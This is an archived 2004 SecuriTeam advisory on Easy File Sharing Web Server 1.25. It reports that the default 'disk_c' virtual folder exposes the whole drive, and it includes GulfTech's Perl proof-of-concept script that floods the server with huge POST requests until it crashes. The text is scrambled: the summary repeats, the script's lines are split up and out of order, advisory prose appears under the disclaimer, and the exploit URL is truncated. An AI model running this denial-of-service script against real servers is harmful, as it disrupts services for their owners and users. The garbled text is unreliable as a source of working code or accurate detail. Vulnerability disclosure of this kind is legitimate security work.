[NT] Easy File Sharing Web Server File Access and DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 08/29/04
- Previous message: SecuriTeam: "[NT] Painkiller DoS and Limited Code Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 29 Aug 2004 08:43:09 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Easy File Sharing Web Server File Access and DoS
------------------------------------------------------------------------
SUMMARY
<http://www.sharing-file.com> Easy File Sharing Web Server is a file
sharing software that allows visitors to upload/download files easily
through a Web Browser (IE, Netscape, Opera etc.). It can help you share
files with your friends and colleagues. They can download files from your
computer or upload files from theirs. They will not be required to install
this software or any other software because an Internet browser is enough.
Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum .
The EFS web server allows any file on the file system to be accessed and
is also vulnerable to denial of service.
<http://www.sharing-file.com> Easy File Sharing Web Server is a file
sharing software that allows visitors to upload/download files easily
through a Web Browser (IE, Netscape, Opera etc.). It can help you share
files with your friends and colleagues. They can download files from your
computer or upload files from theirs. They will not be required to install
this software or any other software because an Internet browser is enough.
Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum .
The EFS web server allows any file on the file system to be accessed and
is also vulnerable to denial of service.
DETAILS
Vulnerable Systems:
* Easy File Sharing webserver version 1.25
Unauthorized System Access
This URL will give an attacker read access to the entire C drive. The
Denial Of Service
Exploit:
use IO::Socket;
print "=====================================================\n".
unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }
my $remote_host = $ARGV[0];
print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";
while ($post) {
print $i $post;
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@gulftech.org>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
The authorization function used by EFS web server is supposed to keep just
anyone from being able to access your files. But this is not the case and
an attacker has read access to the entire hard drive by default:
http://
issue is exploited by requesting the name of a virtual folder on the
server (disk_c is there by default.)
Easy File Sharing Web Server is vulnerable to a DoS attack and may even be
remotely crashed by sending a number of large HTTP requests to the web
server. The CPU usage goes up to 99% and in some cases the server crashes.
#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################
" Easy File Sharing Webserver v1.25 Denial Of Service \n".
"=====================================================\n";
my $remote_port = $ARGV[1];
my $done = "\015\012\015\012";
my $buff = "A" x 1000000;
my $post = "POST /".$buff." HTTP/1.0 ".$done;
for (my $i=1; $i<10; $i++) {
my $i = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $remote_host,
PeerPort => $remote_port,
Timeout => '10000',
Type => SOCK_STREAM,
) || die("[*] Server Is Dead!");
$i->autoflush(1);
}
}
close $i;
GulfTech Security.
The original article can be found at:
<http://www.gulftech.org/?node=research&article_id=00045-08242004>
http://www.gulftech.org/?node=research&article_id=00045-08242004
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... Get your security news from a reliable source. ... "poison" a user's browser
cache with a malicious document that will later ... The attacker can exploit this vulnerability
for "replacing" HTML ... to communicate with a malicious web server over HTTPS without
the browser ... (Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... complete Web Server environment
written entirely on top of 4th Dimension, ... WS4D web server saves the passwords
somewhere insecure. ... (Securiteam)
... "Locked-down windows 2003 Web Server used only to host web sites". ... What
is your logic/rationale for Media Player being a required install ... The Media Player
patch was the ONLY that FAILED. ... > When talking about computer security, there
are areas that have no such ... (microsoft.public.windows.server.security)
... SECURITY PROBLEMS WITH WEB SERVERS' SESSION TRACKING MECHANISMS. ... 2001 we
reported the following problem (with specifics to IIS and SITESERVER) to the Microsoft Security
Response Center. ... These vulnerabilities, especially when combined with well-known cross-site
scripting vulnerabilities, could cause loss of confidentiality, failure of non-repudiation and fraud.
... The browser stores and returns the "ASPSESSIONID" or "CFID/CFTOKEN" values with each subsequent
request to the web server. ... (Vuln-Dev)
... disagreement with their business strategy though and their ... >attempt to
repair security flaws...". ... My point is that they are patching a damaged architecture.
... >recommended not allowing parent paths on the Web server. ... (microsoft.public.frontpage.client)
